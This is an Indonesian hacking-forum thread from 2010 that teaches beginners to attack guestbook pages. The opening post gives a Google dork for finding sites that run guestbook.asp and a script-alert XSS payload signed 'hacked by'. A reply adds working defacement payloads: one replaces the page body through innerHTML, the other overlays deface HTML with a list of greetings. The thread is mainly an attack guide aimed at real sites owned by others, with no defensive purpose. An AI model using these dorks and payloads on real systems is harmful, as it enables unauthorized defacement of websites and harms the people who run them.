Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

The largest cyber security forum in Indonesia with more than 129000 members
http://xcode.or.id/forum/

[Newbie only] XSS for hajar guestbook

http://xcode.or.id/forum/viewtopic.php?f=99&t=40190

Page 1 of 1

[Newbie only] XSS for hajar guestbook

Posted: Sun Aug 22, 2010 1:12 am
by demonbrando
maaf klo tutor ini repost,klo repost or salah tempat apus or pindahin aja om poni :maaf: :maaf:

tutor ini sama dengan tutor om darkzzz yg tentang deface guestbook tapi ini lebih cupu dari tutor om darkzzz maklum masih newbie... :circle: :circle:

oke langsung ajah mulae,pertama kita cari website yg ada guestbooknya
contoh : buka google terus ketik : allinurl:/guestbook.asp

klo sudah cari web yg kamu mau...
contoh sperti ini : Image

kalo sudah copas script berikut ini :

Code: Select all

<script type="text/javascript">alert('hacked by : DemonBrando a.k.a D.13..')</script>


scriptnya bisa kamu ubah sesuka kamu...

dan hasilnya akan jadi seperti gambar di bawah ini :
Image

selamat mencoba... :rokok:

maklum tutornya masih cupu apabila ada kesalahan mohon pencerahanya yah kk... :maaf: :maaf:

Re: [Newbie only] XSS for hajar guestbook

Posted: Sun Aug 22, 2010 1:29 am
by Darkzzzz
verify.asp?
Ane gak ngerti gan, mentok cuma sampe verify.asp nya doank yang ke deface :circle:
Pas di refresh, ya normal lagi :mati:
Harusnya yang ke deface itu halaman untuk membaca buku tamu yang orang-orang submit :putusasa: Betul kagak gan? :cry:

Code: Select all

<script>document.body.innerHTML="<h1>XSS Defacing</h1>This Site Has XSSed By : Darkzzzz<br/>Greetz To : Poni, Wilmar Kidz, Phychole, Paman, XShadow, Abah, Bi4kKob4r, Peniru, Hanjian Family, 3tr3m3b0y, etc<br/>Visit http://xcode.or.id";</script>
atau

Code: Select all

<DIV align=center>
<DIV id=Layer1 style="BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px;  1; LEFT: 1px; BORDER-LEFT: #000000 1px; WIDTH: 1500px; BORDER-BOTTOM: #000000 1px; POSITION: absolute; TOP: 0px; HEIGHT: 5000px; BACKGROUND-COLOR: #000000; layer-background-color: #000000">
<br /><br />
<br>
<center>
<font face="Arial" color="red" size="4"><strong><br><br><br>XSS Defacing
<br>
</center>
<font face="Courier New" color="#FF0000" size="3"><center>Greetz To : 2KA01,XCode,Adelia,Si S (2KA01)</left></font>

<left><font face="arial" size="3" color="#FF0000">
<marquee behavior="alternate" scrolldelay="100" style="width: 90%">Sez L3ve B4 U'r XPunged.!!!!!
</li>
</ul>
</td>
</tr>
</table>

Re: [Newbie only] XSS for hajar guestbook

Posted: Sun Aug 22, 2010 10:24 pm
by demonbrando
hehehe ini cuma hajar bagian dari sisi client aja om darkzzz ga di deface om cuma nampilin message box kyk di gambar di atas om darkzzz klo udah di refresh yah toh balik lagi ke awal.... maklum om saya bukan defacer and bikin tutorial masih cupu.... :circle: :circle: :maaf: :maaf:

Re: [Newbie only] XSS for hajar guestbook

Posted: Thu Oct 28, 2010 5:59 pm
by inyo^
wah wah.. heheh
All times are UTC+07:00
Page 1 of 1
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/